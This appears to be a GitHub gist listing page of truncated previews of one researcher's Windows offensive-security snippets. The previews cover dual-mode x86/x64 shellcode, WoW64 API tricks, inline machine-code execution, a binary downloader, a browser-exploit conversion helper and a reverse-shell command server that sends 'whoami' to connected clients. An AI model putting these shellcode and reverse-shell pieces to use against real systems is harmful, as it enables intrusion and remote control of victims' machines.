aaaddress1 / x96_shellcode.py
Created May 19, 2021 05:45
Python Script to Generate x96 Windows Shellcode
# x96_shellcode.py
# ref: gist.github.com/aaaddress1/3c0ae754f8a40024881343a085954049
# by aaaddress1@chroot.org
'''
entry:
call $+5
mov ax, cs
sub ax, 23h
je retTo32b
nop
aaaddress1 / x96shell_msgbox.asm
Created May 7, 2021 07:31
x96 Windows Shellcode: one payload able to be used in both 32-bit & 64-bit
; x96 shellcode (x32+x64) by aaaddress1@chroot.org
; yasm -f bin -o x96shell_msgbox x96shell_msgbox.asm
section .text
bits 32
_main:
call entry
entry:
mov ax, cs
sub ax, 0x23
jz retTo32b
aaaddress1 / wow64Mem_Forensics.cpp
Last active May 3, 2024 22:12
get 64 bit windows API address in pure 32 bit mode
// get 64 bit Windows API in pure 32 bit mode!
// it's necessary to disable all compiler optimizations if you're using MSVC.
// more detail check out ReWolf's amazing trick: blog.rewolf.pl/blog/?p=102
// by aaaddress1@chroot.org
#include <iostream>
#include <stdio.h>
#include <windows.h>
// ref: raw.githubusercontent.com/rwfpl/rewolf-wow64ext/master/src/wow64ext.h
#include "wow64ext.h"
aaaddress1 / wow64_read64Env.cpp
Created April 20, 2021 10:37
fetch current EXE path from 64 bit PEB->Ldr (In 32 bit mode)
// fetch current EXE path from 64 bit PEB->Ldr (In 32 bit mode)
// by aaaddress1@chroot.org
#include <stdint.h>
#include <stdio.h>
#include <windows.h>
typedef struct _PEB_LDR_DATA64
{
ULONG Length;
BOOLEAN Initialized;
ULONG64 SsHandle;
aaaddress1 / memcpy32.cpp
Created April 20, 2021 09:48
memcpy32.cpp
// memcpy 32bit by aaaddress1@chroot.org
#include <stdint.h>
#include <stdio.h>
#include <windows.h>
int main(void) {
int dummy(0x41414242);
char buf[8] = {0};
((void(cdecl *)(DWORD, DWORD, DWORD))"\x8B\x7C\x24\x04\x8B\x74\x24\x08\x8B\x4C\x24\x0C\xF3\xA4\xC3")((size_t)buf, (size_t)&dummy, sizeof(dummy));
puts(buf);
aaaddress1 / http_download.h
Last active May 3, 2024 22:13
using WinHTTP to obtain binary data (MSVC)
// using WinHTTP to obtain binary data (MSVC)
// by aaaddress1@chroot.org
#include <vector>
#include <stdio.h>
#include <windows.h>
#include <Winhttp.h>
#pragma comment(lib, "winhttp")
using namespace std;
vector<char>* httpRecv(const wchar_t url[]) {
class Helpers {
constructor() {
this.cvt_buf = new ArrayBuffer(8);
this.cvt_f64a = new Float64Array(this.cvt_buf);
this.cvt_u64a = new BigUint64Array(this.cvt_buf);
this.cvt_u32a = new Uint32Array(this.cvt_buf);
}
ftoi(f) {
aaaddress1 / cmdSrv.py
Created March 4, 2021 15:47
cmdSrv.py
'''
Cmd Multiple RevShell Server by aaaddress1@chroot.org
[test] $ ncat localhost 54321 | cmd
'''
import time, socket
def handleClient(connection):
try:
time.sleep(1)
connection.send(b'whoami && echo 123 > ggdada.txt && exit\n')
except Exception as e:
aaaddress1 / dynPatchSelf.cc
Last active February 26, 2021 08:05
dynPatchSelf.cc
// dynamic patch self function by aaaddress1@chroot.org
#include <windows.h>
#include <algorithm>
#include <iterator>
using namespace std;
// Prints a fixed greeting line to stdout (puts appends the newline).
// NOTE(review): the file header describes this program as patching its own
// function at runtime (main is outside this excerpt), so this body is most
// likely the patch target; any change to it alters the machine code that
// main rewrites — confirm against main before editing.
void hello()
{
puts("Are You Helloing?");
}
int main(void)
aaaddress1 / vehMon.cpp
Last active May 3, 2024 22:14
VEH Monitor
// VEH Monitor by aaaddress1@chroot.org
#include <stdio.h>
#include <windows.h>
#pragma warning( disable : 4996 )
LONG __stdcall TrapFilter(PEXCEPTION_POINTERS pexinf) {
if (pexinf->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION && ((DWORD)pexinf->ExceptionRecord->ExceptionAddress & 0x80000000))
pexinf->ContextRecord->Eip = pexinf->ContextRecord->Eip ^ 0x80000000;
else if (pexinf->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP)
return EXCEPTION_CONTINUE_SEARCH;